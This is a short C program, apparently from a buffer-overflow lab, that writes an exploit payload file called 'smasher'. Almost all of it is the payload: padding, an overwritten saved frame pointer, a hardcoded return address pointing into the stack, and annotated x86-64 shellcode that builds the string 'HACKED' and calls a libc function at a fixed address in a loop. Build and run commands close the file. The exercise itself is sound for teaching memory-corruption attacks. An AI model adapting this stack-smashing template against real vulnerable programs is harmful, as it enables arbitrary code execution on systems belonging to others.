#include <stdlib.h>
#include <stdio.h>
#include <string.h>

static char code[166] = { 
			0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
			0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
			0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
			0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

		    0x80,0xde,0xff,0xff,0xff,0x7f,0x00,0x00,	// ebp
			0x41,0xdc,0xff,0xff,0xff,0x7f,0x00,0x00,	// return address
		    0x68,0xdf,0xff,0xff,0xff,0x7f,0x00,0x00,	// parameter (int)
			0x87,0x77,0xb9,0xf7,0x01,0x00,0x00,0x00,	// parameter (char *)
			
			0x55,									// push   %rbp
			0x48,0x89,0xe5,							// mov    %rsp,%rbp
			0x48,0x83,0xec,0x20,					// sub    $0x20,%rsp
			0x89,0x7d,0xec,							// mov    %edi,-0x14(%rbp)
			0x48,0x89,0x75,0xe0,					// mov    %rsi,-0x20(%rbp)
			0x64,0x48,0x8b,0x04,0x25,0x28,0x00,		// mov    %fs:0x28,%rax
			0x00,0x00,
			0x48,0x89,0x45,0xf8,					// mov    %rax,-0x8(%rbp)
			0x31,0xc0,								// xor    %eax,%eax
			0xc6,0x45,0xf0,0x48,					// movb   $0x48,-0x10(%rbp)
			0xc6,0x45,0xf1,0x41,					// movb   $0x41,-0xf(%rbp)
			0xc6,0x45,0xf2,0x43,					// movb   $0x43,-0xe(%rbp)
			0xc6,0x45,0xf3,0x4b,					// movb   $0x4b,-0xd(%rbp)
			0xc6,0x45,0xf4,0x45,					// movb   $0x45,-0xc(%rbp)
			0xc6,0x45,0xf5,0x44,					// movb   $0x44,-0xb(%rbp)
			0xc6,0x45,0xf6,0x20,					// movb   $0x20,-0xa(%rbp)
			0xc6,0x45,0xf7,0x00,					// movb   $0x0,-0x9(%rbp)
			0x48,0x8d,0x45,0xf0,					// lea    -0x10(%rbp),%rax
			0x48,0xba,0x80,0x8e,0xa4,0xf7,0xff,		// movabs $0x7ffff7a48e80,%rdx
			0x7f,0x00,0x00,
			0x48,0x89,0xc7,							// mov    %rax,%rdi
			0xb8,0x00,0x00,0x00,0x00,				// mov    $0x0,%eax
			0xff,0xd2,								// callq  *%rdx
			0xeb,0xe6,								// jmp    638 <main+0x3e>
			0x66,0x2e,0x0f,0x1f,0x84,0x00,0x00,		// nopw   %cs:0x0(%rax,%rax,1)
			0x00,0x00,0x00,
			0x0f,0x1f,0x40,0x00						// nopl   0x0(%rax)
};

int main(int argc, const char * argv[])
{ 
    FILE *badfile;
    badfile = fopen("smasher", "w");
    fwrite(code, sizeof(char), sizeof(code), badfile);
    printf("SIZE=%lu\n",sizeof(code));
  return 0;
}




// gcc writer.c -o writer
// ./writer